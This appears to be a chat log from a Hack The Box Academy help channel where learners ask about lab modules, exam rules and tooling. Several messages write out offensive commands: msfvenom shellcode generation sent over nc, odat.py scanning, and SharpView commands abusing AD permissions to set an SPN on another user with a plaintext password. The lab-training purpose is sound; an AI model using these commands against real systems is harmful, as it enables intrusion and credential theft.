it would greatly help if you said what module/section you're on, otherwise no one can really answer your question other than maybe the password isn't in rockyou

CRACKING PASSWORDS WITH HASHCAT
Page 10
Working with Rules

Hey guys I had a question. There is a session stealing module in the CBBH. However, it makes the user himself act like the target and makes the user request the malicious page. It also automates the target accessing a malicious page.

Is there going to be an automated target that accesses a malicious page that you send to it in the CBBH exam?

no one can answer that question

that would require divulging exam information

can u please answer mine one ?

don't have my notes rn so no

😦

Can someone point me in the right direction to find the API key in the admin directory. I am in Information gathering - web edition skill assessment. I have answered all other questions and am still brute forcing sub domains and curling. Thanks in advance!

https://hashcat.net/wiki/doku.php?id=rule_based_attack

brute force sub domains, then enumerate the subdomains you find carefully. You'll find the key

hello everyone

anyone having failed target instance spawns? i had one take the better part of an hour before it finally timed out

seems to be working now, albeit a little slow

Hello, I was wondering if someone could help me, I'm currently taking Intro to Assembly Language Module, in the Shellcoding tools section, there is this excercise: "The above server simulates an exploitable server you can execute shellcodes on. Use one of the tools to generate a shellcode that prints the content of '/flag.txt', then connect to the sever with "nc SERVER_IP PORT" to send the shellcode. " I'm currently trying to execute the shellcode but I get no output. I'm not sure what I am doing wrong.

use nc to connect to the target, and send the shellcode only

plz someone help me

pwnbox cant ping target, but web dashboard is showing target as spawned with ip address... just reset the target and obtained a new ip and same issue... an hour or two ago the target instance load-looped for 45+ minutes before finally failing out... should this be reported?

if I send the shellcode with quotation marks I get "Failed to run shellcode!" and without quotation marks I get this "/bin/sh: 1: ‘cat/flag.txt’: " It seems like it waits another input

Its not printing anything

I created the shellcode out of this command: msfvenom -p linux/x64/exec CMD=‘cat/flag.txt’ -a x64 --platform linux -e x64/xor -f hex

you can test it in your own system

just make a /flag.txt

have you tried to tee your cmd and redirect to file so you can inspect the output? do you know what the rule is actually showing? its certainly doing something

yeah i have tried

i conme to know now

Do I create a flag.txt which prints whatever?

try @next bronze suggestion

HTB rule: "Think out of Box"

and i got it
Thanks HTB

is there a space between cat and flag.txt?

no

not sure if there needs to be, but in typical command entry you put a space (as you prob already know)

msfvenom -p linux/x64/exec CMD=‘cat /flag.txt’ -a x64 --platform linux -e x64/xor -f hex

like this?

yes

well...

use the full path, cat /root/flag.txt or cat /home/user/flag.txt type deal if its in cwd then use cat ./flag.txt

alright alright, I'm going to try

can everyone ping their target box? im still having problems spawning, connecting and pinging to target instances

im not sure if this is supposed to be this way (hardening) or what but ive never had an academy module target box that wouldnt ping

yeah I can ping

thx

module and section? some of them don't respond to ping

Module windows fundamentals section ntfs and share permissions i believe.... https://academy.hackthebox.com/module/49/section/1017

^

looks like this may be a me issue, a super long nmap just returned 2 ports open... no port 139 or 445 whcih would explain why i cant connect with smbclient maybe im not supposed to actually follow this part along but just read instead?

let me try to do something from the actual question/answer section

yeah that doesn't repond to ping, just rdp in

hmm last question sorta suggests that you should be on an smb share to correctly answer the question (ie: its not theoretical) but i dunno?

oh goodness ive got the cart before the horse here... i prob cant connect to smb share cause i need to rdp in and create a shared folder first... >_< (sorry ive been at this for a few hours with interruptions)

this might be false alarm

@next bronze just rdp'd in created the dir and shared it but still cant connect via smb client as outlined in the guide, 139 and 445 port showing filtered with -sSV scan, -sV scan and a --script smb-vuln* scan (respectively or combinations thereof) not sure where im going wrong here

wait... firewall

there is a part about firewall in the section

yes

didnt realize this was setup in this manner i thought it was supposed to be just open, as its an easy module

well it could've been clearer I guess https://discord.com/channels/473760315293696010/1260517830244302930

yeah, i wish they would've outlined the specific fire wall rules to enable... i tried doing the ones i know about in the gui (file and printer sharing, file/printer sharing smb) couldnt get it to work until i disabled the whole firewall >_<

Yes I tried that initially, then as it ignored the second one I tried using the and operator, then I assumed perhaps you cant request two things in event data within the same query... judging by how this query is inside <query list> tags it made sense to assume you can list multiple query tags so I tried that, I even tried an and operator between the two query tags. I even used an AI to see if one queries syntax is different from the other (which it shouldn't be because it is nested in exactly the same fashion).
Tried looking up xml querying on YouTube and couldn't find a thing in depth enough.
The link within that unit of the module didn't detail the syntax for this either.

I ended up just totally guessing, and decided to switch the queries' order.
This worked by luck because there are only two logs that contain the desired .dll as an affected file.
Maybe I am just being dumb, but I'll mention it to the course content guys, because maybe I am not 😂

hi

Hey guys, is there gonna be a 1 year student plan in htb academy by any chance in the near future?

highly doubt there will be a Student Annual sub. the Student sub is already extremely good as it is now

ahh damn I was hoping to get a 1 year subscription before I finish uni 😦

oh well

when are you finishing uni?

because i still have 2 more years of this shit hole

they really could've picked a shorter flag for the SQLMap "flag5" question* this is taking FOREVER 😅

(connecting from Australia means a big ol' delay is needed on the time to get a real result)

Ahaha yeah I went and read the rest of the module while waiting for it 😄

I'm scared of next paging & the machine dying on me

ahaha guessed the last 8 characters to save a little time

Hey guys I’m about to finish Linux fundamentals.. I’m still way off grasping the fundamentals. Do you think I should go through it again before moving on

If you want to work with Linux, it is very important that you understand the basics.
The same goes for Windows or MacOS.

This august 😅

Ull get thru it man, just enjoy it as well, I feel like that plays a big part cos Ive also been in the work force and its boring ash

https://discord.com/channels/473760315293696010/1269178628613079072

f best of luck

yeah i try my best lol

i will be there in 1 or 1.5 years lol

Hello everyone, good morninr!

I am stuck in the Attacking Thick Client applications... Someone has recently done this section_!

You'll be in London in 1 years? Wanna DM me in that case?

sure

Idk what this has to do with academy

Oh wrong chat lmao

whoops

Make sure to go through all chat above and let em know

Chats gotta stay ✨ sterile ✨

Module: Footprinting
Section: OracleTNS

Problem: Cannot find the login with odat.py, i specified my IP address

command i issued: ./odat.py all -s 10.129.205.19

@fathom pendant possible to get some support maybe?

are you connected to the VPN

Yeah

maybe the protocol wasnt properly selected holdon

Okay yeah that makes sense im using the wrong protocol

will redo again

i had some real troubles with parsing ssh private key on one of the modules, and it turned out to be tmux issue, is there someone i could discuss it with?

did you find the CPTS exam challenging?

also does the exam tell you where you went wrong, and what you need to improve on for a better success rate on your second attempt?

Or does it say nope, here are ur results.

WHOOHOO!! it's working 😄

Some that has done recently the Attacking Thick Applications module, I am in the last step but I have been stuck for a while

There's no direct hints. The feedback is on your report

Ohh, so you'll only be given your feedback and that's it?

Yep

well that's okay hopefully when i do it, i get a nice feedback, what's the amount of marks needed to pass it?

?

There's no x/y grading for the report

You either pass or fail

Other than that 12/14 flags are required

But you can absolutely fail on the report

Flags are only half of the exam

ah ripp

so let's say u try to obtain 12 flags right, even if ur report sucks you will fail still?

Correct

The report is literally the other portion of the exam

so even if ur report was good as hell like i mean insanely well and u only get 11 flags

u still fail? so it's a must to get 12 atleast

Correct

damn that is quite challenging

But I wouldn't worry about the report until you get the flags

but isnt the report like how u got the flag and what the problem was and how to secure the issue?

It's all gone over in the documentation and reporting module

oohh

Also it's not how you got the flag

It's reporting on what's vulnerable

And risks, severity, impact

OHH so u got to give in the risk, severity, impact and what the vulnerability is in depth

in order for you to do well?

Again

its what a company will expect when they pay a company lots of money for a pentest

The documentation and reporting module goes over it

i was gonna do the document reporting module last after i done everything

And it's required in the path

well thats where it is. right before Attacking Enterprise Networks

You should do it before the enterprise network module ofc

Since you should do a practice report on the enterprise network module

so the way they did HTB academy paths are in order u must follow? Cause i've been selecting ones i find interesting first before i did the others

Correct

You should be doing it in order

fudge, i done it randomly in diff orders didnt even think order mattered

you can learn whatever you want, where/when you want. but the path is the recommended path.

The path is laid out that way for a reason

Pivoting before AD, footprinting before attacking

alr i'll start from the top then again

You don't need to "start over"

Just finish the path in order

okok

And I can guarantee some modules you skipped over would have made modules you struggled on a lot simpler

ah u right, that's my bad i didnt even know i just thought they would cover what to do for each thing without involving anything else

Higher tier modules assume baseline knowledge to jump off of

some of the modules i went to do i had no problems doing them at all even when i went in different orders

It's why the information Security Foundations path is a prerequisite

they are independent to a certain extent. but as marcie says they assume knowledge of lower level tiers

like the metasploit one i understood properly to do without going to any previous modules

Well yes

Because that is dealing with specifically metasploit

Without needing much other knowledge

and ffuf

Again

Tool specific

ur right

So not requiring much brain power

fax, anyways yeah i will be back if im struggling with anything

Tip: don't rush for answers

Exhaust all available options before going and asking for a nudge

yeah ofc

Hey guys.

I am having a problems with the pwnbox instance a lot of the questions in the linux fundamentals are not accurate can anyone help me with the issue?

?

Most questions require you to ssh to a target

in the pass attacks module hard skill assessment, how do i crack the .vhd bitlocker password? i tried bitlocker2john then john but its taking forever

I need help with the very easy sherlock called noxious

Task 8 is not working and i hve done everything right

What password list are you using

#sherlocks , read and follow #welcome to access it

This channel is for academy modules, not main site content

I am not seeing a follow button

@fathom pendant ive tried to allow all inbound traffic on ports 445 and 139, and Im still not able to send my smb request for the share I created. any hints?

? read #welcome there are instructions on how to access more of the server towards the bottom

no idea dude

mutated one

Try rockyou

ok

Hi guys, I'm struggling with the "ACL Abuse Tactics" question, inside the Active Directory Enumeration & Attacks module.

I'm running the following commands:

$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred2 = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword) 
SharpView.exe Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

The thing is that I'm getting this error:

[Get-Domain] Using alternate credentials for Get-Domain
[Get-Domain] Extracted domain '$TargetDomain' from -Credential
An error occurred: 'System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.ArgumentException: The specified string parameter is empty.
Parameter name: name
   at System.DirectoryServices.ActiveDirectory.DirectoryContext..ctor(DirectoryContextType contextType, String name, String username, String password)
   at SharpView.PowerView.Get_Domain(Args_Get_Domain args)
   at SharpView.PowerView.Get_DomainSearcher(Args_Get_DomainSearcher args)
   at SharpView.PowerView.Get_DomainObject(Args_Get_DomainObject args)
   at SharpView.PowerView.Set_DomainObject(Args_Set_DomainObject args)
   --- End of inner exception stack trace ---
   at System.RuntimeMethodHandle.InvokeMethod(Object target, Object[] arguments, Signature sig, Boolean constructor)
   at System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(Object obj, Object[] parameters, Object[] arguments)
   at System.Reflection.RuntimeMethodInfo.Invoke(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
   at SharpView.Program.Run(String[] args)
   at SharpView.Program.Main(String[] args)'

any idea?